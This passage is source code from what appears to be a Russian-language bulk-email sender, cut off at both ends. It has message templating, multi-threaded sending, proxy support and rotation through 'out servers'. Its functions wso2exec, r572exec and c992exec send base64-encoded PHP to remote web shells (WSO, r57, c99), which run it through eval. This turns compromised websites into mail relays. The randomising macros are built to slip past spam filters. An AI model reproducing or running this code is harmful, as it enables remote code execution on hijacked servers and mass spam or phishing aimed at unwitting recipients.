$file_data=explode("\n", file_get_contents($file_path));
print count($file_data);
}
exit;
}
function ReplaceFileTemplate(&$target, &$email) {
if(preg_match_all('/\[FILE:(.+?)\]/', $target, $arr, PREG_PATTERN_ORDER)) {
foreach ($arr[0] as $key => $value) {
$file_path=$arr[1][$key];
if(!file_exists($file_path) || !is_readable($file_path))
$target=str_replace($value, "file not available", $target);
else {
$file_data=explode("\n", file_get_contents($file_path));
$result_str=$file_data[($email[enumer]-1)%count($file_data)];
$target=str_replace($value, $result_str, $target);
}
}
}
}
function ReplaceTemplates(&$target, &$email) {
$target=str_replace('[TO-EMAIL]', $email[to], $target);
$target=str_replace('[FROM-NAME]', $email[fromname], $target);
$target=str_replace('[FROM-EMAIL]', $email[frommail], $target);
$target=str_replace('[REPLY-EMAIL]', $email[replymail], $target);
$target=str_replace('[THEME]', $email[tema], $target);
//Макрос умножения
foreach ($email[additional] as $key => $value) {
$target=str_replace('[ADD'.$key.']', $value, $target);
}
ReplaceFileTemplate($target, $email);
if(preg_match_all('/\[(DATE|DAY|MONTH|YEAR|TIME|HOUR|MINUTE)([+-]\d+)*\]/', $target, $arr)) {
foreach ($arr[0] as $key => $value) {
switch ($arr[1][$key]) {
case 'DATE':
$txt_val=date("d.m.Y", strtotime(intval($arr[2][$key])." day"));
break;
case 'DAY':
$txt_val=date("d", strtotime(intval($arr[2][$key])." day"));
break;
case 'MONTH':
$txt_val=date("m", strtotime(intval($arr[2][$key])." month"));
break;
case 'YEAR':
$txt_val=date("Y", strtotime(intval($arr[2][$key])." year"));
break;
case 'TIME':
$txt_val=date("H:i", strtotime(intval($arr[2][$key])." minute"));
break;
case 'HOUR':
$txt_val=date("H", strtotime(intval($arr[2][$key])." hour"));
break;
case 'MINUTE':
$txt_val=date("i", strtotime(intval($arr[2][$key])." minute"));
break;
default:
$txt_val='';
break;
}
$target=str_replace($value, $txt_val, $target);
}
}
if(preg_match_all('/\[\((.*?)\)\*(\d+)\]/', $target, $arr, PREG_PATTERN_ORDER)) {
foreach ($arr[0] as $key => $value) {
$target=str_replace($value, str_repeat($arr[1][$key], $arr[2][$key]), $target);
}
}
if(preg_match_all('/\[ENUM:([^\[\]]+?)\]/', $target, $arr, PREG_PATTERN_ORDER)) {
foreach ($arr[0] as $key => $value) {
$enum_array=explode("|", $arr[1][$key]);
$enum_array_length=count($enum_array);
$target=str_replace($value, $enum_array[$email[enumer]%$enum_array_length], $target);
}
}
if(preg_match_all('/\[RAND\]/', $target, $arr, PREG_PATTERN_ORDER)) {
foreach ($arr[0] as $key => $value) {
$target=preg_replace("/\[RAND\]/", rand(5000,6000), $target, 1);
}
}
if(preg_match_all('/\[RAND\-(\d+)\-(\d+)\]/', $target, $arr, PREG_PATTERN_ORDER)) {
foreach ($arr[0] as $key => $value) {
$target=preg_replace("/".str_replace(array("[","]"), array("\[","\]"), $value)."/", rand($arr[1][$key],$arr[2][$key]), $target, 1);
}
}
while(preg_match_all('/\[RAND:([^\[\]]+?)\]/u', $target, $arr, PREG_PATTERN_ORDER)) {
foreach($arr[0] as $key => $value) {
$words=explode("|",$arr[1][$key]);
$target=preg_replace("/".preg_quote($value,"/")."/", $words[array_rand($words)],$target, 1);
}
}
}
function applyEnumer($field, $enumer) {
if(strpos($field, "\n")==-1) return $field;
$field_values=explode("\n", $field);
$field_values_count=count($field_values);
$value=$field_values[$enumer%$field_values_count];
return $value;
}
function makeAttach($attachedFiles, $boundary) {
$data="";
if($attachedFiles==null) return $data;
foreach ($attachedFiles as $index => $file) {
if($file==null) continue;
$data.="--$boundary\n";
$data.="Content-Type: ".$file['type']."; name=\"".$file['name']."\"\n";
$data.="Content-Transfer-Encoding:base64\n";
$data.="Content-ID: <".md5($file['name']).">\n\n";
$data.=chunk_split($file['content'])."\n";
}
return $data;
}
function wso2exec($url, $pass, $code) {
$postdata = http_build_query(
array(
'pass' => $pass,
'a' => 'RC',
'p1' => trim($code)
)
);
return get_content($url, $postdata, 10);
}
function ars2exec($url, $pass, $req="test", $data) {
$postdata = http_build_query(
array(
'pass' => $pass,
'req' => $req,
'data' => $data
)
);
$response=get_content($url, $postdata, 10);
$response_decoded=json_decode($response,true);
if($req=="test")
if($response_decoded['status']=="GOOD")
return "test";
else
return "bad";
//print $response;
return $response_decoded;
}
function r572exec($url, $login, $pass, $code, $timeout=10) {
$str_start=randomstr();
$str_end=randomstr();
$eval_sub='eval(base64_decode($_POST["debug_value_fgtr"]));';
$eval_sub="echo('".substr($str_start,0,4)."'.'".substr($str_start,4,4)."');".$eval_sub."die('".substr($str_end,0,4)."'.'".substr($str_end,4,4)."');";
$post='php_eval='.urlencode($eval_sub).'&dir=.%2F&cmd=php_eval&submit=exec&debug_value_fgtr='.urlencode(base64_encode($code));
if(!empty($pass) && !empty($login)){
$post.='&auth_user='.urlencode($login).'&auth_pass='.urlencode($pass);
$headers=array('Authorization: Basic '.base64_encode($login.':'.$pass));
}else{
$headers=array();
}
$headers[]='Content-type: application/x-www-form-urlencoded';
$opts = array('http' =>
array(
'method' => 'POST',
'proxy' => (defined('PROXY'))?('tcp://' . PROXY):null,
'header' => implode(PHP_EOL, $headers),
'timeout' => $timeout,
'content' => $post
)
);
//print_r($opts);
$context = stream_context_create($opts);
$response=@file_get_contents($url, false, $context);
$response=strstr($response, $str_start);
$response=str_replace(array($str_end, $str_start), "", $response);
return $response;
}
function c992exec($url, $login, $pass, $code, $timeout=10) {
$str_start=randomstr();
$str_end=randomstr();
$eval_sub='eval(base64_decode($_POST["debug_value_fgtr"]));';
$eval_sub="echo('".substr($str_start,0,4)."'.'".substr($str_start,4,4)."');".$eval_sub."die('".substr($str_end,0,4)."'.'".substr($str_end,4,4)."');";
$post='act=eval&eval='.urlencode($eval_sub).'&d=.%2F&eval_txt=1&debug_value_fgtr='.urlencode(base64_encode($code));
if(!empty($pass) && !empty($login)){
$headers=array('Authorization: Basic '.base64_encode($login.':'.$pass));
}else{
$headers=array();
}
$headers[]='Content-type: application/x-www-form-urlencoded';
$opts = array('http' =>
array(
'method' => 'POST',
'proxy' => (defined('PROXY'))?('tcp://' . PROXY):null,
'header' => implode(PHP_EOL, $headers),
'timeout' => $timeout,
'content' => $post
)
);
//print_r($opts);
$context = stream_context_create($opts);
$response=@file_get_contents($url, false, $context);
$response=strstr($response, $str_start);
$response=str_replace(array($str_end, $str_start), "", $response);
return $response;
}
function randomstr($int=8){
$str='';
$arr='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
for($i=0;$i<$int;$i++) $str.=$arr{rand(0,61)};
return $str;
}
function get_content($url, $post,$timeout) {
$opts = array('http' =>
array(
'method' => 'POST',
'proxy' => (defined('PROXY'))?('tcp://' . PROXY):null,
'header' => 'Content-type: application/x-www-form-urlencoded',
'timeout' => $timeout,
'content' => $post
)
);
$context = stream_context_create($opts);
return @file_get_contents($url, false, $context);
}
?>
<html>
<head>
<title><?php tr('name',false); ?> <?php echo VERSION;?></title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<link href="http://netdna.bootstrapcdn.com/bootswatch/2.3.0/united/bootstrap.min.css" rel="stylesheet">
<link rel="shortcut icon" type="image/x-icon" href="" />
<style>
body {
background-color: WHITE;
}
.content {
margin: 0 auto;
background-color: #fcf2d4;
width: 1000px;
padding: 5px;
border: 1px solid black;
border-radius: 5px;
}
#console {
margin: 0 auto;
padding: 5px;
border-radius: 5px;
}
#ext-console {
padding: 5px;
border-radius: 5px;
overflow-y: scroll;
height: 620px;
text-align: left;
}
a:link {
color: #000;
}
a:visited {
color: #000;
}
.miniimput {
font-family: Tahoma,Geneva,sans-serif;
font-size: 14pt;
border-color: 336699;
border-style: inset;
border-width: 2px;
}
#upload_button {
display: inline-block;
width: 24px;
height: 24px;
background-image: url();
}
#help-screen,#settings-screen,#preview-screen {
display: none;
}
#done {
background-color: YellowGreen;
width: 0;
height: 15px;
padding: 0;
margin: 0;
border-radius: 5px;
}
.addfield {
font-family: "Arial Black","Gadget",sans-serif;
font-size: 30px;
color: #04bf0a;
-moz-user-select: none;
-khtml-user-select: none;
user-select: none;
cursor: pointer;
}
#makebold {
font-weight: bold;
}
#makeitalic {
font-style: italic;
}
#makeunderline {
text-decoration: underline;
}
.button {
padding: 5px 10px;
display: inline;
background: #777 url() repeat-x bottom;
border: 0;
color: #fff;
cursor: pointer;
font-weight: bold;
border-radius: 5px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
text-shadow: 1px 1px #666;
margin: 0 5px;
}
.button:hover {
background-position: 0 -48px;
}
.button:active {
background-position: 0 top;
position: relative;
top: 1px;
padding: 6px 10px 4px;
}
#attachedFiles .File a {
color: RED;
font-weight: bold;
text-decoration: none;
font-family: 'Arial Black',Gadget,sans-serif;
}
#attachedFiles div {
display: inline-block;
width: 24px;
height: 24px;
background: url();
}
#TIMEOUT_RANGE {
display: inline-block;
margin-left: 20px;
vertical-align: middle;
width: 300px;
}
.alexus-range,.alexus-range .crange {
height: 20px;
padding: 0;
}
.alexus-range .crange {
background-color: Orange;
}
.alexus-range,.alexus-range .crange,.alexus-range .range-controller {
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
.alexus-range {
width: 100%;
background-color: white;
text-align: left;
margin-top: 10px;
margin-bottom: 10px;
}
.alexus-range .crange {
width: 0;
}
.alexus-range .range-controller {
width: 15px;
height: 25px;
margin-top: -24px;
margin-left: 0;
cursor: pointer;
padding: 0;
}
.barcounter {
position: absolute;
text-align: center;
width: 700px;
}
.txtinput {
height: 28px;
min-height: 28px;
}
.form-horizontal .control-label {
width: 250px;
}
.form-horizontal .controls {
margin-left: 260px;
}
.button.white {
background-color: NavajoWhite;
color: #000;
text-shadow: 1px 1px NavajoWhite;
}
.button.large {
font-size: 125%;
padding: 7px 12px;
}
.button.large:hover {
background-position: 0 -35px;
}
.button.large:active {
padding: 8px 12px 6px;
background-position: 0 top;
}
h2 {
margin-top: -15px;
}
#prime img, #help img, #settings img {
height: 24px;
}
#outprogressbar .barcounter {
width: 900px;
}
</style>
<style type="text/less">
.status {
padding: 5px;
/*.header {
b {
display: inline-block;
margin-top: -7px;
}
i {
display: block;
float: right;
margin-top: -3px;
}
}
.data {
padding-top: 10px;
}*/
.controls {
text-align: right;
float: right;
}
}
</style>
<script src="http://cdnjs.cloudflare.com/ajax/libs/less.js/1.4.1/less.min.js" type="text/javascript"></script>
<script>
var Done=new Array();
var maxDoneSize=25;
var toDo=new Array();
var additional=new Array(); var toDoSize=0;
var enumer=0;
var attachedFiles=new Array();
var outServers={
active: false,
position: 0,
servers: new Array(),
servers_hash: "",
updateServers: function() {
if(this.servers_hash==$("#out_servers").val()) return;
this.servers_hash=$("#out_servers").val();
var tmpservers=this.servers_hash.split("\n");
this.servers=[];
for(var i in tmpservers) {
if(tmpservers[i].length<3) continue;
this.servers.push(tmpservers[i]);
}
this.position=0;
},
getServer: function() {
if(this.position>=this.servers.length) this.position=0;
var serv=this.servers[this.position];
this.position++;
return serv;
}
}
var threadNum=4;
var timeoutNum=0;
var AddNum=1;
var status="stop";
function ChangePass(login, pass) {
$.post('<?php print $_SERVER['PHP_SELF'];?>?changepass',{login:login,pass:pass}, function(data) {
var response=$.parseJSON(data);
if(response['result']=='ok')
$("#passchangesuccess").show();
else
$("#passchangeerror").show();
});
}
function pingoutservers() {
var servers=$("#out_servers").val();
if(servers=="") return;
window.pingout_servers=servers.split("\n");
window.pingout_servers_todo=window.pingout_servers.length;
$("#out_servers").val("");
$("#pingout_log").html("");
update_pingoutprogress();
for(var i=0; i<4; i++)
pingout_server();
}
function pingout_server() {
if(window.pingout_servers.length==0) return;
var server=window.pingout_servers.pop();
$.post('<?php print $_SERVER['PHP_SELF'];?>?pingoutserver',{server:server}, function(data) {
var result=$.parseJSON(data);
var log=$("#pingout_log").html();
if(result.status=="GOOD") {
$("#pingout_log").html(log+"<span style='color:green;'>"+result.server+" работает</span><br>");
$("#out_servers").val($("#out_servers").val()+result.server+"\n");
} else {
$("#pingout_log").html(log+"<span style='color:red;'>"+result.server+" ошибка: "+result.error+"</span><br>");
}
$("#pingout_log").scrollTop($("#pingout_log").prop("scrollHeight"));
update_pingoutprogress();
pingout_server();
});
}
function update_pingoutprogress() {
var pingoutservers_done=window.pingout_servers_todo-window.pingout_servers.length;
var opb=$("#outprogressbar");
$(opb).find(".barcounter").text(pingoutservers_done+"/"+window.pingout_servers_todo);
var percent=parseInt(pingoutservers_done/(window.pingout_servers_todo/100));
$(opb).find(".bar").css("width",percent+"%");
}
function Send(){
enumer=0;
if($("#use_out_servers").is(':checked')) {
outServers.updateServers();
outServers.active=true;
} else {
outServers.active=false;
}
var res=$("#to").val().match(/\[FILE:(.+?)\]/);
if(res!=null) {
var pattern=res[0];
var file_path=res[1];
$.post("?linesinfile",{file_path:file_path},function(data){
var linesinfile=parseInt(data);
toDo=[];
for(var i=0;i<linesinfile;i++)
toDo.push(pattern);
toDoSize=toDo.length;
SetProgressBar(0,"0/"+toDoSize);
ResumeSendMail();
});
} else {
toDo=$("#to").val().split("\n");
toDoSize=toDo.length;
SetProgressBar(0,"0/"+toDoSize);
ResumeSendMail();
}
}
function PauseSendMail() {
status="pause";
$("#PauseSendMail").prop("disabled",true);
$("#ResumeSendMail, #StopSendMail").prop("disabled",false);
$(".status span.tr-status-idle").removeClass("label-success label-warning").addClass("label-danger").text("<?php tr('status-pause',false);?>");
}
function ResumeSendMail() {
status="start";
$("#ResumeSendMail").prop("disabled",true);
$("#PauseSendMail, #StopSendMail").prop("disabled",false);
$(".status span.tr-status-idle").removeClass("label-danger label-warning").addClass("label-success").text("<?php tr('status-sending',false);?>");
for(var i=0; i<threadNum; i++) SendMail();
}
function StopSendMail() {
status="stop";
StopSendMailHandler();
}
function Preview(){
var params={
to :"null@null.null",
fromname:ReplaceEnum($("#fromname").val(), false),
frommail:ReplaceEnum($("#frommail").val(), false),
replymail:ReplaceEnum($("#replymail").val(), false),
tema :ReplaceEnum($("#tema").val(), false),
type :$("#type").val(),
text :ReplaceEnum($("#text").val()),
enumer :(toDoSize-toDo.length)
};
if(additional.length==0)
$(".additional").each(function(){
additional.push(ReplaceEnum($(this).val()));
});
else
$(".additional").each(function(index, value){
if(index<additional.length) return;
additional.push(ReplaceEnum($(this).val()));
});
for(i in additional) {
params["additional["+i+"]"]=additional[i];
}
$.post('<?php print $_SERVER['PHP_SELF'];?>?preview', params, function(data){
if($("#type").val()=='text')
showPreviewWindow('data:text/plain;charset=utf-8;base64,'+Base64.encode(data));
else
showPreviewWindow('data:text/html;charset=utf-8;base64,'+Base64.encode(data));
});
}
function StopSendMailHandler() {
//alert("Рассылка завершена!");
$(".status span.tr-status-idle").removeClass("label-success label-danger").addClass("label-warning").text("<?php tr('status-idle',false);?>");
$(".status .btn").prop("disabled",true);
}
function SendMail() {
if(status=="pause")
return;
else if(status=="stop") {
//toDo=[];
//toDoSize=0;
//SetProgressBar((toDoSize-toDo.length)/(toDoSize/100),(toDoSize-toDo.length)+"/"+toDoSize);
return;
}
if(toDo.length==0) {//!email || email=="" || email==" ") {
//останавливаем остальные потоки и генерируем событие окончания рассылки
status="stop";
StopSendMailHandler();
return;
}
var email=toDo.pop();
additional=new Array();
if(email.indexOf(";")!=-1) {
var emailadds=email.split(";");
for(var adds in emailadds) {
if(adds==0)
email=emailadds[0];
else
additional.push(emailadds[adds]);
}
}
var params={
to :email,
fromname:ReplaceEnum($("#fromname").val(), false),
frommail:ReplaceEnum($("#frommail").val(), false),
replymail:ReplaceEnum($("#replymail").val(), false),
tema :ReplaceEnum($("#tema").val(), false),
type :$("#type").val(),
captcha_code:$("input[name=captcha_code]").val(),
text :ReplaceEnum($("#text").val()),
enumer :(toDoSize-toDo.length)
};
//1.6.5 (16.09.2013) прокси
if($("#use_proxy_server").is(":checked")) params['PROXY']=$("#proxy_server_uri").val();
if(attachedFiles.length!=0) params['files']=JSON.stringify(attachedFiles);
if(additional.length==0)
$(".additional").each(function(){
additional.push(ReplaceEnum($(this).val()));
});
else
$(".additional").each(function(index, value){
if(index<additional.length) return;
additional.push(ReplaceEnum($(this).val()));
});
for(i in additional) {
params["additional["+i+"]"]=additional[i];
}
if(outServers.active) params["outserver"]=outServers.getServer();
$.post('<?php print $_SERVER['PHP_SELF'];?>?send', params, function(data){
if(data=="CAPTCHA ERROR") {
$("#console").html("<?php tr('badcaptcha');?>");
$("#console").css("background-color","Tomato");
return;
} else if(data=="OUT OF LIMIT") {
$("#console").html("<?php tr('sendlimit');?>");
$("#console").css("background-color","Tomato");
return;
}
$("#console").html(data);
$("#console").css("background-color","YellowGreen");
var email=data.split(" ");
AddDone(email[2]);
DrawDone();
SetProgressBar((toDoSize-toDo.length)/(toDoSize/100),(toDoSize-toDo.length)+"/"+toDoSize);
if(timeoutNum==0)
SendMail();
else
setTimeout(function(){SendMail()},timeoutNum*1000);
});
}
function SetProgressBar(count,text) {
var psize=parseInt($("#progressbar").css("width"))/100;
$("#progressbar .bar").css("width",count+"%");
$("#progressbar .barcounter").text(text);
}
function AddDone(item) {
if(Done.length>maxDoneSize)
Done.splice(0,1);
Done.push(item);
}
function DrawDone() {
$("#ext-console").html("");
var txt="";
for(i in Done) {
txt=Done[i]+"<br>"+txt;
}
$("#ext-console").html(txt);
}
function dThreads(){
if(threadNum==1) return;
threadNum--;
ShowThreads();
}
function iThreads(){
if(threadNum==100) return;
threadNum++;
ShowThreads();
}
function ShowThreads() {
$("#THREADS").text(threadNum);
}
function ShowUpload() {
$("#FileUploadDialog").modal("show");
}
function HideUpload() {
$("#FileUploadDialog").modal("hide");
}
function HideAttache() {
$("#univarsalUpload").hide();
}
function showUniversalUpload() {
if($("#univarsalUpload").css("display")=="none") {
$("#univarsalUpload").children(".modal-body").children("iframe").attr("src","<?php print $_SERVER['PHP_SELF'];?>?upload_universal");
$("#univarsalUpload").modal("show");
} else $("#univarsalUpload").modal("hide");
}
function UploadClickHandler(object) {
$(object).parent().parent().children(".modal-body").children("iframe").contents().find("form").submit();
}
window.uploadFinishedHandler=function(data) {
if(data==null) return;
var file=$.parseJSON(Base64.decode(data));
attachedFiles.push(file);
updateFileList();
$("#univarsalUpload").modal("hide");
}
function updateFileList() {
$("#attachedFiles").html("");
for(var file in attachedFiles) {
if(file=='remove') continue;
$("#attachedFiles").html($("#attachedFiles").html()+(file!=0?"<br>":"")+"<i class='icon-file'></i> "+attachedFiles[file]['name']+" <button class='btn' onclick='removeFile("+file+");return false'><?php tr('delete',false);?></button>");
}
}
function removeFile(id) {
delete attachedFiles[id];
updateFileList();
}
function TogleLoadSave() {
if($("#LoadSaveDialog").css("display")=="none") {
$("#LoadSaveDialog").find("iframe").attr("src","<?php print $_SERVER['PHP_SELF'];?>?loadsave");
$("#LoadSaveDialog").modal("show");
} else {
$("#LoadSaveDialog").modal("hide");
}
}
function upload_finished(data) {
$("#to").val(data.replace(new RegExp(" ",'g'),"\n"));
$("#FileUploadDialog").children("iframe").attr("src","<?php print $_SERVER['PHP_SELF'];?>?upload_form");
HideUpload();
}
function AddField(object) {
$(object).parent().parent().after('<br><div class="input-prepend"><span class="add-on">[ADD'+AddNum+']</span></div> <input type="text" name="additional'+AddNum+'" id="additional'+AddNum+'" class="input-xlarge txtinput additional" placeholder="<?php tr('addfield2',false);?> '+AddNum+'"> <div class="input-append"><span class="add-on"><span class="addfield" onclick="AddField(this)">+</span></span>');
$(object).parent().parent().remove();
AddNum++;
}
function SaveData() {
$("#LoadSaveDialog").find("iframe").attr("src","<?php print $_SERVER['PHP_SELF'];?>?savedata").load(function(){
$("#LoadSaveDialog").find("iframe").unbind("load");
var data="[FROM-NAME]"+$("#fromname").val()+"\n"+"[FROM-EMAIL]"+$("#frommail").val()+"\n"+"[THEME]"+$("#tema").val()+"\n"+"[TYPE]"+$("#type").val()+"\n";
$(".additional").each(function(index, value){
data+="[ADD"+index+"]"+$(value).val()+"\n";
});
if(attachedFiles.length!=0) data+='[FILES]'+JSON.stringify(attachedFiles)+"\n";
data+="[TEXT]"+$("#text").val().replaceAll("&","&");
$("textarea",$(this).contents()).val(data);
$("form",$(this).contents()).submit();
});
}
function loadsave(data) {
var content=data.split("[TEXT]");
$("#text").val(content[1].replaceAll("&","&"));
content=content[0].split("\n");
for(var i in content) {
if(content[i].indexOf("[FROM-NAME]")!=-1) {
content[i]=content[i].replace("[FROM-NAME]","");
$("#fromname").val(content[i]);
} else if(content[i].indexOf("[FROM-EMAIL]")!=-1) {
content[i]=content[i].replace("[FROM-EMAIL]","");
$("#frommail").val(content[i]);
} else if(content[i].indexOf("[THEME]")!=-1) {
content[i]=content[i].replace("[THEME]","");
$("#tema").val(content[i]);
} else if(content[i].indexOf("[TYPE]")!=-1) {
content[i]=content[i].replace("[TYPE]","");
$("#type [value='"+content[i]+"']").attr("selected", "selected");
} else if(content[i].indexOf("[FILES]")!=-1) {
content[i]=content[i].replace("[FILES]","");
attachedFiles=$.parseJSON(content[i]);
updateFileList();
} else if(content[i].indexOf("[ADD")!=-1) {
var result=/\[ADD(\d+)\]/.exec(content[i]);
if(AddNum<=result[1]) {
AddField($(".addfield:last"));
}
content[i]=content[i].replace(result[0],"");
$("#additional"+result[1]).val(content[i]);
}
}
TogleLoadSave();
}
$(document).ready(function(){
$("#prime, .prime-button").click(function(){
$(".section-screen").hide();
$("#prime-screen").show();
});
$("#help").click(function(){
$(".section-screen").hide();
$("#help-screen").show();
});
$("#settings").click(function(){
$(".section-screen").hide();
$("#settings-screen").show();
});
$(".btn-checkbox").click(function() {
if($(this).hasClass("btn-success")) {
$($(this).attr("data-toggle")).prop("checked",false);
$(this).removeClass("btn-success").addClass("btn-danger").children("i").removeClass("icon-ok").addClass("icon-remove");
} else {
$($(this).attr("data-toggle")).prop("checked",true);
$(this).removeClass("btn-danger").addClass("btn-success").children("i").removeClass("icon-remove").addClass("icon-ok");
}
});
$("#maxDoneSize").change(function() {
maxDoneSize=$(this).val();
});
alexusRange.create($("#TIMEOUT_RANGE"));
alexusRange.change($("#TIMEOUT_RANGE"),function(range) {
isetTimeout(alexusRange.get($(range)));
$("#TIMEOUT").val(timeoutNum);
});
$("#TIMEOUT").keyup(function() {
isetTimeout($(this).val());
alexusRange.set($("#TIMEOUT_RANGE"),timeoutNum);
});
alexusRange.set($("#TIMEOUT_RANGE"),timeoutNum);
$("[rel=tooltip]").tooltip();
ShowThreads();
});
function isetTimeout(val) {
var newTimeout=parseInt(val);
if(newTimeout<0)
timeoutNum=0;
else if(newTimeout>14400)
timeoutNum=14400;
else
timeoutNum=newTimeout;
}
function MakeBold() {
wrapText("text","<b>","</b>");
}
function MakeItalic() {
wrapText("text","<i>","</i>");
}
function MakeUnderline() {
wrapText("text","<u>","</u>");
}
function ReplaceEnum(data) {
return data;
//Этот функционал перенесен в php часть
}
function MakeReverse() {
var textArea = $("#text");
var len = textArea[0].value.length;
var start = textArea[0].selectionStart;
var end = textArea[0].selectionEnd;
var selectedText = textArea[0].value.substring(start, end);
selectedText=selectedText.split("").reverse().join("");
var replacement = "<span style=\"direction: rtl;unicode-bidi: bidi-override;\">" + selectedText + "</span>";
textArea[0].value=textArea[0].value.substring(0, start) + replacement + textArea[0].value.substring(end, len);
}
function wrapText(elementID, openTag, closeTag) {
var textArea = $('#' + elementID);
var len = textArea[0].value.length;
var start = textArea[0].selectionStart;
var end = textArea[0].selectionEnd;
var selectedText = textArea[0].value.substring(start, end);
var replacement = openTag + selectedText + closeTag;
textArea[0].value=textArea[0].value.substring(0, start) + replacement + textArea[0].value.substring(end, len);
}
function showPreviewWindow(link) {
$("#preview-screen").find("iframe").attr("src", link);
$(".section-screen").hide();
$("#preview-screen").show();
$(window).scrollTop(0);
}
var alexusRange={
mouseX:0,
newX:0,
rangeCounter:0,
changeHandlers:{},
create:function(range) {
$(range).addClass("alexus-range").addClass("well").append('<div class="crange"></div><div class="range-controller btn"></div>');
if(alexusRange.rangeCounter==0) $(document).mouseup(alexusRange.mouseupHandler);
$(range).children(".range-controller").mousedown(alexusRange.mousedownHandler);
alexusRange.rangeCounter++;
$(range).attr("ruqid",alexusRange.rangeCounter);
},
RangeMouseMoveHandler:function(e) {
if(alexusRange.mouseX==0) alexusRange.mouseX=e.pageX;
alexusRange.newX=e.pageX
if(e.pageX!=alexusRange.mouseX)
$(".alexus-range .range-controller[state=inmove]").each(function() {
var max_pos=parseInt($(this).parent().css("width"))-parseInt($(this).css("width"))-2;
var cur_pos=parseInt($(this).css("margin-left"));
var delta=alexusRange.mouseX-alexusRange.newX;
if(cur_pos-delta<0)
cur_pos=0;
else if(cur_pos-delta>max_pos)
cur_pos=max_pos;
else
cur_pos-=delta;
$(this).css("margin-left", cur_pos);
$(this).parent().children(".crange").css("width",parseInt(cur_pos/(max_pos/100))+"%");
if(alexusRange.changeHandlers[alexusRange.uniqueId($(this).parent())]!=undefined)
alexusRange.changeHandlers[alexusRange.uniqueId($(this).parent())]($(this).parent());
});
alexusRange.mouseX=alexusRange.newX;
},
change:function(range, handler) {
alexusRange.changeHandlers[alexusRange.uniqueId($(range))]=handler;
},
mousedownHandler:function() {
$(this).attr("state","inmove");
$(document).mousemove(alexusRange.RangeMouseMoveHandler);
},
mouseupHandler:function() {
$(".alexus-range .range-controller[state=inmove]").attr("state","relax");
$(document).unbind("mousemove", alexusRange.RangeMouseMoveHandler);
alexusRange.ResetPos();
},
ResetPos:function() {
alexusRange.mouseX=0;
},
get:function(range) {
var max_pos=parseInt($(range).css("width"))-parseInt($(range).children(".range-controller").css("width"))-2;
var cur_pos=parseInt($(range).children(".range-controller").css("margin-left"));
var max_val=parseInt($(range).attr("max"));
var min_val=parseInt($(range).attr("min"));
return parseInt((max_val-min_val)*(cur_pos/max_pos))+min_val;
},
set:function(range, val) {
var max_pos=parseInt($(range).css("width"))-parseInt($(range).children(".range-controller").css("width"))-2;
var cur_pos=parseInt($(range).children(".range-controller").css("margin-left"));
var max_val=$(range).attr("max");
var min_val=$(range).attr("min");
var pos=parseInt(max_pos*(((val-min_val)/(max_val-min_val))));
if(pos<0)
pos=0;
else if(pos>max_pos)
pos=max_pos;
$(range).children(".range-controller").css("margin-left",pos);
$(range).children(".crange").css("width",parseInt(pos/(max_pos/100))+"%");
},
uniqueId:function(range) {
return $(range).attr("ruqid");
}
}
function setLang(code) {
if(code=='ru') {
setCookie('translation','ru',{path:"/"});
document.location.reload();
} else {
setCookie('translation',code,{path:"/"});
document.location="/"+code+"/";
document.location.reload();
}
}
function setCookie(name, value, props) {
props = props || {}
var exp = props.expires
if (typeof exp == "number" && exp) {
var d = new Date()
d.setTime(d.getTime() + exp*1000)
exp = props.expires = d
}
if(exp && exp.toUTCString) { props.expires = exp.toUTCString() }
value = encodeURIComponent(value)
var updatedCookie = name + "=" + value
for(var propName in props){
updatedCookie += "; " + propName
var propValue = props[propName]
if(propValue !== true){ updatedCookie += "=" + propValue }
}
document.cookie = updatedCookie
}
String.prototype.replaceAll = function(search, replace){
return this.split(search).join(replace);
}
var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=Base64._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},decode:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=Base64._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/\r\n/g,"\n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}}
</script>
</head>
<body>
<div class="modal hide fade" id="univarsalUpload">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3><?php tr('attachfile');?></h3>
</div>
<div class="modal-body">
<iframe src="<?php print $_SERVER['PHP_SELF'];?>?upload_universal" width="260px" height="80px" frameborder="0"></iframe>
</div>
<div class="modal-footer">
<a href="#" class="btn" data-dismiss="modal"><?php tr('close');?></a>
<a href="#" class="btn btn-primary" onclick="UploadClickHandler(this);return false"><?php tr('upload');?></a>
</div>
</div>
<div class="modal hide fade" id="FileUploadDialog">
<div class="modal-header">
